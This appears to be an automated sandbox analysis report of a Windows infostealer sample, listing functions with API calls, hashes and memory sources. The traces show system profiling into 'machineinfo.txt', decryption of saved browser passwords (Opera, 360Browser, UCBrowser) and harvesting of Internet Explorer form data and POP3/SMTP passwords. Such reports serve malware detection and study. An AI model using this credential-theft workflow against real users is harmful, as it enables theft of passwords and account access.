                                                          • Opcode ID: b06cd57ba67ee620f0fb8231170526488e4c38a668e5c2a679edc2696f7ddbab
                                                          • Instruction ID: 86dc4b22d1170e7d7ba6de5b17aeeda0f8ac52a6bf25cb6d4df79ba8c85a3813
                                                          • Opcode Fuzzy Hash: b06cd57ba67ee620f0fb8231170526488e4c38a668e5c2a679edc2696f7ddbab
                                                          • Instruction Fuzzy Hash: 5B4129705042489BDB218B18CD94BFB7BFE9B15305F2444BEE98A87143D278AE4DDB26
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040FA2B, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040FA30
                                                            • Part of subcall function 0040891A: __EH_prolog.LIBCMT ref: 0040891F
                                                            • Part of subcall function 00408A68: __EH_prolog.LIBCMT ref: 00408A6D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: e770533dc9807212034766fb2ac04599e8310c2b0a4aa99ab1bd882f2e83bc6a
                                                          • Instruction ID: 506f7e53412ed80650c82115e114087f8c38d987e664835764ba12939623c8fc
                                                          • Opcode Fuzzy Hash: e770533dc9807212034766fb2ac04599e8310c2b0a4aa99ab1bd882f2e83bc6a
                                                          • Instruction Fuzzy Hash: 4C219D71E012249FDB64DF69C88479ABBF0AF08304F0084BEE50AE7692DB74AA04CF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045829B, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43a2e60386d253da83511993e5843b6a5afdd142690f7523a5a816589aeeb1f4
                                                          • Instruction ID: 9f8fc3bdf3194c7b5d8c9623237c46e47ecbbbbf6b63708adbb919750aeb073d
                                                          • Opcode Fuzzy Hash: 43a2e60386d253da83511993e5843b6a5afdd142690f7523a5a816589aeeb1f4
                                                          • Instruction Fuzzy Hash: B9012D37300611DF9B158E69EC40A5B3796AB81731725413EFD00EB156DE35D8099759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004602E0, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00457F6D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00456DCD,00000001,00000364,00000006,000000FF,?,0044077E,00000002,00000000,?,?), ref: 00457FAE
                                                          • _free.LIBCMT ref: 0046034F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: d0f9411b1447318f41f9e2aa4998a381d9e51052fbda47b2237b8770dde4b63d
                                                          • Instruction ID: 3c4d5805f5261bfb5b522168aebfe5ff1b6d7f7aa923dc5267500d2bbfa2e053
                                                          • Opcode Fuzzy Hash: d0f9411b1447318f41f9e2aa4998a381d9e51052fbda47b2237b8770dde4b63d
                                                          • Instruction Fuzzy Hash: 040126726043166BC320CF99D88199FFB98EB08371F10022EE855B77C0E7746D44CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040891A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040891F
                                                            • Part of subcall function 00408873: __EH_prolog.LIBCMT ref: 00408878
                                                            • Part of subcall function 00408873: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 004088E1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$___std_fs_directory_iterator_open@12
                                                          • String ID:
                                                          • API String ID: 1512400408-0
                                                          • Opcode ID: 68431fab68d8af377efd1416f01b55a40a1d4595b1815b73bc40e4484dd4657a
                                                          • Instruction ID: 8219ba6dfbab08e9e1c64d4f9d034e4ccfaee6e3d2806e6740b17572deb908ed
                                                          • Opcode Fuzzy Hash: 68431fab68d8af377efd1416f01b55a40a1d4595b1815b73bc40e4484dd4657a
                                                          • Instruction Fuzzy Hash: 2B0184B1A047059FCB28DF69C5805AEBBF4EF04314F10462EE496A3381CB749A04CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002207A6, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 002207EE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432462370.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                          Similarity
                                                          • API ID: FirstModule32
                                                          • String ID:
                                                          • API String ID: 3757679902-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: ce74107264bb25a571b5d8e17111d222f8b8d0c650ef73faae95785f863c3e9a
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: B9F062311117217BE7203EF5A8CDB6FB6E8AF49765F100528E642950C2DA70F8558A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00457F6D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00456DCD,00000001,00000364,00000006,000000FF,?,0044077E,00000002,00000000,?,?), ref: 00457FAE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 28a9a3cf6bb4a06e14ff56c2f61d641a0c24a165f3708a381af54e12e594c08b
                                                          • Instruction ID: e3c94146916296a4e78fb06bc81cf1adeb04cb2efa7e7e35070366af5a502c77
                                                          • Opcode Fuzzy Hash: 28a9a3cf6bb4a06e14ff56c2f61d641a0c24a165f3708a381af54e12e594c08b
                                                          • Instruction Fuzzy Hash: FCF0B43360C52567AB21EE23AC01A5B7749AF41762B148037FC19D7282DA78DC0982BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004440CE, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?,0048C4DC,00000000,?,00444220,00000004,InitializeCriticalSectionEx,004705E8,004705F0,00000000,?,00443FCD,0048C4DC,00000FA0,00000000), ref: 004440FF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          • Opcode ID: 823382551d0e3636f4cba4fde82f450b5b891783a30632b41141483aa644e599
                                                          • Instruction ID: 6fbc1f769dcd59551f6eda41a5993c93602177762e8f6ef773e4d8de38d257a6
                                                          • Opcode Fuzzy Hash: 823382551d0e3636f4cba4fde82f450b5b891783a30632b41141483aa644e599
                                                          • Instruction Fuzzy Hash: 56F027323002265FBF215FA9EC0569B7798EF94721310002AFE00C62C1EB30D860C794
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00458BEE, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: d450606fe05dfa75acdb89b27d49dbfb1503bc2af728c7d247959ce6b84db16e
                                                          • Instruction ID: b07c539c9a6ea8bfdef05f83ebec2f56bb5a3b9779c3cea84c765c3155d57bfe
                                                          • Opcode Fuzzy Hash: d450606fe05dfa75acdb89b27d49dbfb1503bc2af728c7d247959ce6b84db16e
                                                          • Instruction Fuzzy Hash: EDE0A03110251196AA222B765C0075F6A48DB013A2F14052BED45A62C3DF68CC0A82BE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408DDD, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_fs_copy_file@12.LIBCPMT ref: 00408E01
                                                            • Part of subcall function 0040860C: __EH_prolog2.LIBCMT ref: 00408613
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog2___std_fs_copy_file@12
                                                          • String ID:
                                                          • API String ID: 1952593469-0
                                                          • Opcode ID: 1be79286756df7693e226744e06931632cba41c3e5b8cbb12f84e613e0ce4eea
                                                          • Instruction ID: 5e4b33e9e0e052498fe5a3750c9e61293cf1db95c4c0d0478b45c32c74b40d7e
                                                          • Opcode Fuzzy Hash: 1be79286756df7693e226744e06931632cba41c3e5b8cbb12f84e613e0ce4eea
                                                          • Instruction Fuzzy Hash: 20E0923161560053CA28590E9E09A57B3AFAFD6725F10073EB898972C1EE746C6096ED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040883B, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408862
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_fs_directory_iterator_advance@8
                                                          • String ID:
                                                          • API String ID: 2610647541-0
                                                          • Opcode ID: a327e17a9e32b8b437a34b6dbd96363f02bb2f8ecc4a75c05e333e037143e1c2
                                                          • Instruction ID: 2497740882e0beba90344e1c83bfd149611319c9eaf05d80e67fc5e64194330e
                                                          • Opcode Fuzzy Hash: a327e17a9e32b8b437a34b6dbd96363f02bb2f8ecc4a75c05e333e037143e1c2
                                                          • Instruction Fuzzy Hash: C1E0862B6007205DDA3072735A44D7356A4DE80B64B90D83FE9C5A26C0EF79DD92D26D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043D9FB, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32(00410AD1,?,?,0000000F,?,?,00414AB7,?,00000000), ref: 0043DA0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ApisFile
                                                          • String ID:
                                                          • API String ID: 4028452750-0
                                                          • Opcode ID: 0a0f77d5aea37791821ccf5b82f88d638894d43a7ec4240bba5e4d81ae4cbb4b
                                                          • Instruction ID: 80f08124c7712ce4a2fe8ec818956a43b735e0a045eb47cab91435ce8eced5a7
                                                          • Opcode Fuzzy Hash: 0a0f77d5aea37791821ccf5b82f88d638894d43a7ec4240bba5e4d81ae4cbb4b
                                                          • Instruction Fuzzy Hash: 5FB09270BA6042064F283A35A8654392201839120BB202ABFF443CAAA2EE988844220A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00220465, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 002204B6
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432462370.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: bd87fa25cd0aa524418a6f3f8eaf8c7f47dd0759a146b24f4ca8c1c5badd2221
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: 2C112B79A40208FFDB01DF98C985E99BBF5AF08350F058094FA489B362D771EA50DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 002939C8, Relevance: 36.4, APIs: 24, Instructions: 426stringlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00293A10
                                                          • LoadLibraryW.KERNEL32(0047D4D8), ref: 00293A34
                                                          • _memcmp.LIBVCRUNTIME ref: 00293C60
                                                          • lstrlenW.KERNEL32(?), ref: 00293C73
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293C8E
                                                          • lstrlenW.KERNEL32(?), ref: 00293C9B
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293CBA
                                                          • lstrlenW.KERNEL32(?), ref: 00293CC7
                                                          • lstrcpyW.KERNEL32(00000000,-00000020), ref: 00293CEB
                                                          • lstrlenW.KERNEL32(?), ref: 00293D1F
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293D40
                                                          • StrStrIW.SHLWAPI(?,0047D4F4), ref: 00293E57
                                                          • lstrlenW.KERNEL32(00000000), ref: 00293E62
                                                          • lstrlenW.KERNEL32(?), ref: 00293E72
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00293F00
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrlen$lstrcpy$Library$FreeLoadVersion_memcmp
                                                          • String ID:
                                                          • API String ID: 2958638873-0
                                                          • Opcode ID: b0bd0d9e9b0b3a5b99c9309115df0420087c916f8618ab90d693805c45901e07
                                                          • Instruction ID: 4ba007fe11b92f1bceefb8d16a23b199859656e2942a6c88c44d243a63403080
                                                          • Opcode Fuzzy Hash: b0bd0d9e9b0b3a5b99c9309115df0420087c916f8618ab90d693805c45901e07
                                                          • Instruction Fuzzy Hash: 96F1AC71C10258AFEF14DFA8DC88BEEBBB8AF48304F004069E445E7252EB749955CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004365E1, Relevance: 36.2, APIs: 13, Strings: 7, Instructions: 1160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004365E6
                                                            • Part of subcall function 00436208: __EH_prolog.LIBCMT ref: 0043620D
                                                            • Part of subcall function 00436208: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 004362AB
                                                            • Part of subcall function 00436208: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004362F9
                                                            • Part of subcall function 00436208: RegCloseKey.ADVAPI32(?), ref: 00436302
                                                          • _strftime.LIBCMT ref: 004366C1
                                                          • GetUserDefaultLCID.KERNEL32(00001001,?,00000100), ref: 004366E9
                                                          • GetLocaleInfoA.KERNEL32(00000000), ref: 004366F0
                                                            • Part of subcall function 00437F5A: __EH_prolog.LIBCMT ref: 00437F5F
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0040FBA4: __EH_prolog.LIBCMT ref: 0040FBA9
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 00436937
                                                            • Part of subcall function 00437819: __EH_prolog.LIBCMT ref: 0043781E
                                                            • Part of subcall function 00437819: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 0043789F
                                                            • Part of subcall function 00437819: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 004378EE
                                                            • Part of subcall function 00437819: RegCloseKey.ADVAPI32(?), ref: 0043790F
                                                          • GetComputerNameA.KERNEL32(?,00000101), ref: 00436FCA
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 0043703F
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,00000001), ref: 00437372
                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000001), ref: 0043746B
                                                          • GetSystemMetrics.USER32 ref: 004375DE
                                                          • GetSystemMetrics.USER32 ref: 00437608
                                                          • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00437694
                                                          • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004376EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$NameSystemUser$CloseDevicesDisplayEnumInfoMetricsOpenQueryValue$ComputerDefaultEnvironmentGlobalLocaleMemoryStatusVariable_strcat_strftime
                                                          • String ID: %Y.%m.%d - %X$0$2$5$@$Wed Oct 28 15:17:34 2020$machineinfo.txt
                                                          • API String ID: 2053319943-1214669571
                                                          • Opcode ID: 84218d51796392090e8667aaa3d68ce2b3301a5aa4f23244873d0fee7678721b
                                                          • Instruction ID: abfea3e4094e8553a487bdf0b4b85e29f119cf9b12b82286beb02e9d9548f7d5
                                                          • Opcode Fuzzy Hash: 84218d51796392090e8667aaa3d68ce2b3301a5aa4f23244873d0fee7678721b
                                                          • Instruction Fuzzy Hash: 4BB2D330A042A88BDB25DB65C8507DDBBB1AF59304F1095FED0897B292DB781F89CF49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040A753, Relevance: 34.3, APIs: 14, Strings: 5, Instructions: 1096libraryloaderencryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040A758
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A7B2
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A7F6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A844
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A891
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A8DB
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A925
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A968
                                                          • GetProcAddress.KERNEL32(?,8E8B9694), ref: 0040A9B3
                                                          • wsprintfA.USER32 ref: 0040AA26
                                                            • Part of subcall function 0043464E: __EH_prolog.LIBCMT ref: 00434653
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B277
                                                          • LocalFree.KERNEL32(?,?,?), ref: 0040B2DF
                                                          • LocalFree.KERNEL32(?), ref: 0040B3A6
                                                            • Part of subcall function 0040908B: __EH_prolog.LIBCMT ref: 00409090
                                                            • Part of subcall function 0040908B: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 004090F6
                                                            • Part of subcall function 0040908B: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00409114
                                                            • Part of subcall function 0040908B: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 00409135
                                                            • Part of subcall function 0040908B: LocalAlloc.KERNEL32(00000040,?), ref: 0040918C
                                                            • Part of subcall function 0040908B: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004091B7
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B362
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Crypt$H_prolog$Local$DataDeallocateFreeUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetric_strcatwsprintf
                                                          • String ID: "},$360Browser$Opera$UCBrowser$v10
                                                          • API String ID: 3815792202-3198395839
                                                          • Opcode ID: 929eb78511c6acb0b77fa88ff9a03756cd9b63c319730cf535dd6001ecc4c237
                                                          • Instruction ID: 0ff1f865bf27121258b6bd0f6751053de24a5c95f2dda291bba905f82eba6a15
                                                          • Opcode Fuzzy Hash: 929eb78511c6acb0b77fa88ff9a03756cd9b63c319730cf535dd6001ecc4c237
                                                          • Instruction Fuzzy Hash: E6A2BA309042A89BDF21DB64CC90BEEBBB1AF55304F1044FAE54977292DB785E88CF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0029362C, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 169encryptionstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00293651
                                                          • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 00293672
                                                          • lstrlenW.KERNEL32 ref: 00293681
                                                          • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 00293694
                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,00000000), ref: 002936B7
                                                          • wsprintfW.USER32 ref: 002936F3
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 00293701
                                                          • wsprintfW.USER32 ref: 00293721
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0029372F
                                                          • CryptDestroyHash.ADVAPI32(?,?,00000000,00000000), ref: 00293738
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00293743
                                                          • lstrlenW.KERNEL32 ref: 0029378A
                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000001,?), ref: 002937AD
                                                          • LocalFree.KERNEL32(00000000), ref: 002937E6
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0029375D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 1004607082-680441574
                                                          • Opcode ID: 6e1d7f9e498ebfe6ced7a0adcb90f579f1f4438cdd3b86449c685cdcde921f93
                                                          • Instruction ID: 5594a12c0033271c8811952a18261a0763c8343be8dbfe4b5143a81da24840ba
                                                          • Opcode Fuzzy Hash: 6e1d7f9e498ebfe6ced7a0adcb90f579f1f4438cdd3b86449c685cdcde921f93
                                                          • Instruction Fuzzy Hash: 62511CB1D10209AFEB11DFE4DC89FFEB7BCAF44341F14402AE501E6191E6B49A14CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A3C0C, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282stringencryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002A497B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                            • Part of subcall function 002A497B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                          • CryptUnprotectData.CRYPT32(0047DD20,00000000,00000000,00000000,00000000,00000001,?), ref: 002A3E5F
                                                          • LocalFree.KERNEL32(?), ref: 002A3E97
                                                          • lstrlenW.KERNEL32(POP3 Password), ref: 002A3EA4
                                                          • lstrlenW.KERNEL32(00000001), ref: 002A3EC8
                                                          • lstrlenW.KERNEL32(POP3 Port), ref: 002A3F49
                                                          • wsprintfA.USER32 ref: 002A3F75
                                                          • lstrlen.KERNEL32(?), ref: 002A3F82
                                                          • lstrlenW.KERNEL32(?), ref: 002A3CF7
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          • lstrlenW.KERNEL32(SMTP Email Address), ref: 002A3CD3
                                                            • Part of subcall function 002A4A6E: lstrlen.KERNEL32(?,?,0046C15C), ref: 002A4A9F
                                                            • Part of subcall function 002A4A6E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4ABE
                                                            • Part of subcall function 002A4A6E: lstrcpy.KERNEL32(00000000,?), ref: 002A4AE1
                                                            • Part of subcall function 002A4A6E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4B0D
                                                            • Part of subcall function 002A4B2B: lstrlen.KERNEL32(?,?,?,?,?,?,?,002932D4,00000001,?,0047D3C4,00000006,?,0047D39C,00000012), ref: 002A4B50
                                                            • Part of subcall function 002A4B2B: lstrcpy.KERNEL32(00000000,?), ref: 002A4B77
                                                          • lstrlenW.KERNEL32(POP3 Password2), ref: 002A3D76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
                                                          • String ID: POP3 Password$POP3 Password2$POP3 Port$SMTP Email Address
                                                          • API String ID: 2832241015-1679095740
                                                          • Opcode ID: d4c0f34ac0329164b9f6e19dfeab42f6e863096fa2bdf9b8fc3992459304f70a
                                                          • Instruction ID: f5ea3b50409f7c49ac9c5f3cf45aa2d3bdb9be334a7464886dc0b6ec28029b1b
                                                          • Opcode Fuzzy Hash: d4c0f34ac0329164b9f6e19dfeab42f6e863096fa2bdf9b8fc3992459304f70a
                                                          • Instruction Fuzzy Hash: 28B16071D20219ABDB11EF94C885BEEB7B9AF85304F10C05AE409BB241DBB49A15CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027A9A3, Relevance: 20.3, APIs: 9, Strings: 2, Instructions: 1096encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027A9A8
                                                          • wsprintfA.USER32 ref: 0027AC76
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027AD71
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027AD88
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027B16D
                                                            • Part of subcall function 002A489E: __EH_prolog.LIBCMT ref: 002A48A3
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027B4C7
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0027B52F
                                                          • LocalFree.KERNEL32(?), ref: 0027B5F6
                                                            • Part of subcall function 002792DB: __EH_prolog.LIBCMT ref: 002792E0
                                                            • Part of subcall function 002792DB: LocalAlloc.KERNEL32(00000040,?), ref: 002793DC
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027B5B2
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Local_wcsstr$CryptDataDeallocateFreeUnprotect$Allocwsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 3833138694-3916116036
                                                          • Opcode ID: 838798df1c5f6a086f27246045da4f165c5a6f30830d799437fbb2e428422176
                                                          • Instruction ID: 942d642d4dc3efc21ad6612d2e3cdb041b442be791fdfa45ea316180d4f0bf37
                                                          • Opcode Fuzzy Hash: 838798df1c5f6a086f27246045da4f165c5a6f30830d799437fbb2e428422176
